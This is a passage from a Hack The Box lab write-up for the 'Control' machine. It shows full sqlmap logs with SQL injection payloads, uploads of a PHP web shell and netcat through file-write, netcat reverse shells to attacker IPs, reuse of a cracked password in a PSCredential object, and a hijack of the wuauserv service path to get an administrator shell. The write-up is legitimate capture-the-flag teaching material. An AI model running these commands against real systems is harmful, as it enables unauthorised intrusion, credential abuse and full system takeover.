[10:10:05] [INFO] fetched data logged to text files under '/home/johnd/.sqlmap/output/10.10.10.167'

[*] ending @ 10:10:05 /2020-03-05/

johnd@kali:~/Hack The Box/Control$

Checking the current user (manager) and there associated privileges, it can be seen that the user hasFILE privileges which means we have the ability to read and write files on the server using statements LOAD_FILE() for reading and INTO OUTFILE for writing. Validating this output we perform a simple Load_File query to read a file off the server like so:

sqlmap -r '/home/johnd/Hack The Box/Control/captured_request.txt' --sql-query "SELECT LOAD_FILE('C:/windows/system32/drivers/etc/hosts');"
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.2#stable}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:13:55 /2020-03-05/

[10:13:55] [INFO] parsing HTTP request from '/home/johnd/Hack The Box/Control/captured_request.txt'
[10:13:55] [INFO] resuming back-end DBMS 'mysql' 
[10:13:55] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productId (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: productId=(SELECT (CASE WHEN (1384=1384) THEN 32 ELSE (SELECT 4857 UNION SELECT 9781) END))

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: productId=32;SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: productId=32 AND (SELECT 4677 FROM (SELECT(SLEEP(5)))mAOG)

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: productId=32 UNION ALL SELECT CONCAT(0x716b627171,0x6c7645426a66427172634645774268444b5652747756476567494a7859576269464d644c6c547250,0x7162627671)-- dhsC
---
[10:13:58] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[10:13:58] [INFO] fetching SQL SELECT statement query output: 'SELECT LOAD_FILE('C:/windows/system32/drivers/etc/hosts')'
SELECT LOAD_FILE('C:/windows/system32/drivers/etc/hosts'): '# Copyright (c) 1993-2009 Microsoft Corp.\r\n#\r\n# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\r\n#\r\n# This file contains the mappings of IP addresses to host names. Each\r\n# entry should be kept on an individual line. The IP address should\r\n# be placed in the first column followed by the corresponding host name.\r\n# The IP address and the host name should be separated by at least one\r\n# space.\r\n#\r\n# Additionally, comments (such as these) may be inserted on individual\r\n# lines or following the machine name denoted by a '#' symbol.\r\n#\r\n# For example:\r\n#\r\n#      102.54.94.97     rhino.acme.com          # source server\r\n#       38.25.63.10     x.acme.com              # x client host\r\n\r\n# localhost name resolution is handled within DNS itself.\r\n#\t127.0.0.1       localhost\r\n#\t::1             localhost\r\n'
[10:13:59] [INFO] fetched data logged to text files under '/home/johnd/.sqlmap/output/10.10.10.167'

6.1 Arbitrary File Upload

Our next step is to upload a PHP Web Shell that will allow us to execute files on the remote system.

sqlmap -r '/home/johnd/Hack The Box/Control/captured_request.txt' --file-write '/home/johnd/Github/Reverse Shells/PHP Reverse Web Shells/Simple-PHP-Web-Shell/index.php' --file-dest 'C:/inetpub/wwwroot/undergrad.php'
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.2#stable}
|_ -| . [)]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:20:55 /2020-03-05/

[10:20:55] [INFO] parsing HTTP request from '/home/johnd/Hack The Box/Control/captured_request.txt'
[10:20:55] [INFO] resuming back-end DBMS 'mysql' 
[10:20:55] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productId (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: productId=(SELECT (CASE WHEN (1384=1384) THEN 32 ELSE (SELECT 4857 UNION SELECT 9781) END))

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: productId=32;SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: productId=32 AND (SELECT 4677 FROM (SELECT(SLEEP(5)))mAOG)

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: productId=32 UNION ALL SELECT CONCAT(0x716b627171,0x6c7645426a66427172634645774268444b5652747756476567494a7859576269464d644c6c547250,0x7162627671)-- dhsC
---
[10:20:56] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[10:20:56] [INFO] fingerprinting the back-end DBMS operating system
[10:20:56] [INFO] the back-end DBMS operating system is Windows
[10:20:57] [WARNING] time-based comparison requires larger statistical model, please wait............................. (done)                                                                                                             
[10:21:01] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
do you want confirmation that the local file '/home/johnd/Github/Reverse Shells/PHP Reverse Web Shells/Simple-PHP-Web-Shell/index.php' has been successfully written on the back-end DBMS file system ('C:/inetpub/wwwroot/undergrad.php')? [Y/n] 
[10:21:03] [INFO] the local file '/home/johnd/Github/Reverse Shells/PHP Reverse Web Shells/Simple-PHP-Web-Shell/index.php' and the remote file 'C:/inetpub/wwwroot/undergrad.php' have the same size (1770 B)
[10:21:03] [INFO] fetched data logged to text files under '/home/johnd/.sqlmap/output/10.10.10.167'

[*] ending @ 10:21:03 /2020-03-05/

Navigating to http://10.10.10.167/undergrad.php we can see that our reverse shell uploaded successfully.

7. Getting User Flag

Next we upload the netcat executable in order to give us a reverse shell

sqlmap -r '/home/johnd/Hack The Box/Control/captured_request.txt' --file-write '/usr/share/windows-resources/binaries/nc.exe' --file-dest 'C:/inetpub/wwwroot/undergrad.exe'        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.2#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:26:18 /2020-03-05/

[10:26:18] [INFO] parsing HTTP request from '/home/johnd/Hack The Box/Control/captured_request.txt'
[10:26:18] [INFO] resuming back-end DBMS 'mysql' 
[10:26:18] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productId (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: productId=(SELECT (CASE WHEN (1384=1384) THEN 32 ELSE (SELECT 4857 UNION SELECT 9781) END))

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: productId=32;SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: productId=32 AND (SELECT 4677 FROM (SELECT(SLEEP(5)))mAOG)

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: productId=32 UNION ALL SELECT CONCAT(0x716b627171,0x6c7645426a66427172634645774268444b5652747756476567494a7859576269464d644c6c547250,0x7162627671)-- dhsC
---
[10:26:18] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[10:26:18] [INFO] fingerprinting the back-end DBMS operating system
[10:26:18] [INFO] the back-end DBMS operating system is Windows
[10:26:58] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)                                                                                                            

[10:27:38] [INFO] the local file '/usr/share/windows-resources/binaries/nc.exe' and the remote file 'C:/inetpub/wwwroot/undergrad.exe' have the same size (59392 B)

[10:27:38] [INFO] fetched data logged to text files under '/home/johnd/.sqlmap/output/10.10.10.167'

[*] ending @ 10:27:38 /2020-03-05/

Going back to our webshell we execute the following command:

undergrad.exe -e powershell.exe 10.10.15.5 4444

As can be seen in Figure 19 we have successfully executed a reverse shell and are operating as the user nt authority\iusr which is a built-in user for Microsoft IIS. Checking user accounts - Figure 19 we can see an account belonging to Hector. Having already cracked hectors password earlier we can escalate our privs to this user using powershell by creating a PSCredential object and passing the -Credential flag in Invoke-Command.

Setting up the object:

$pass = ConvertTo-SecureString 'l33th4x0rhector' -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential("Fidelity\Hector", $pass)

Next create another Netcat listener on a different port on the attacker machine.

We can now use the Invoke-Command to execute our reverse shell.

Invoke-Command -Computer Fidelity -Credential $cred -ScriptBlock { cmd.exe "/c C:\inetpub\wwwroot\undergrad.exe -e powershell.exe 10.10.15.5 5555" }

8. Privilege Escalation

Checking the user permissions and groups doesn't result in much. Next we can upload some windows privilege escalations scripts to help with finding potential attack vectors

We can use the simple HTTP server module in python to host the files on our attacker pc and then use powershell to retrieve them

Invoke-WebRequest http://10.10.15.58:8000/winPEAS.exe -OutFile C:\Users\Hector\Documents\winPeas.exe

None of this scripts revealed much. The next step was to check what services Hector has control over. We can discover this by running this ugly PS-cmd script:

get-acl HKLM:\System\CurrentControlSet\services* | Format-List * | findstr /i "Hector Users Path"

9. Getting Root.txt

9.1 Trusted Service Paths

We abuse more or less any of these services (in this case wuauserv) to execute a netcat shell with administrators privileges. To do this we first check the current ImagePath

Next we modify the ImagePath to execute a netcat shell (undergrad.exe that we uploaded in Section 6.1)

reg add "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /t REG_EXPAND_SZ /v ImagePath /d "C:\inetpub\wwwroot\undergrad.exe 10.10.15.174 6666 -e cmd.exe" /f

Next we setup our listener.

Finally we start the service using the command sc.exe start wuauserv and we should have successfully received a reverse shell that allows us to retrieve the root.txt flag

PreviousHack The Box - Monteverde NextHack The Box - Resolute

Last updated 5 years ago

Was this helpful?